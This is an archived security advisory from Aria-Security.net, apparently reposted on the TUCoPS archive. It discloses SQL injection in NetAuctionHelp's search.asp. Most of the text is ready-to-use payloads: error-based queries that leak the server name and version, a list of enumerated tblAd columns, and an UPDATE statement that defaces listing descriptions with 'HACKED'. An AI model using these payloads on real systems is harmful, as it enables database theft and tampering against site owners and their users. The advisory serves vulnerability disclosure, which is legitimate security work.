TUCoPS :: HP Unsorted N :: tb13532.htm

NetAuctionHelp SQL Injection
Aria-Security.net: NetAuctionHelp SQL Injection
Aria-Security.net: NetAuctionHelp SQL Injection



Aria-Security Net=0D
Original Advisory @ http://aria-security.net/forum/showthread.php?p=1099=0D 
------------------------=0D
Vendor: http://www.netauctionhelp.com=0D 
=0D
PoC:=0D
search.asp?sort=ni&category=&categoryname=&kwsearch=&nsearch=[SQL INJECTION]=0D
search.asp?sort=ni&category=&categoryname=&kwsearch=&nsearch='having 1=1--=0D
=0D
search.asp?sort=ni&category=&categoryname=&kwsearch=&nsearch=1' or 1=convert(int,@@servername)--=0D
search.asp?sort=ni&category=&categoryname=&kwsearch=&nsearch=1' or 1=convert(int,@@version)--=0D
=0D
=0D
=0D
tblAd.id=0D
tblAd.aspectratio=0D
tblAd.title=0D
tblAd.imagepath=0D
tblAd.startdate=0D
tblAd.enddate=0D
tblAd.id_seller=0D
tblAd.descr=0D
=0D
-1' UPDATE tblAd set descr= 'HACKED' Where(ID= '1');--=0D
=0D
this code with update itemdetl.asp?id=1=0D
=0D
=0D
Credit goes to Aria-Security.Net=0D
Greetz: AurA=0D

TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2024 AOH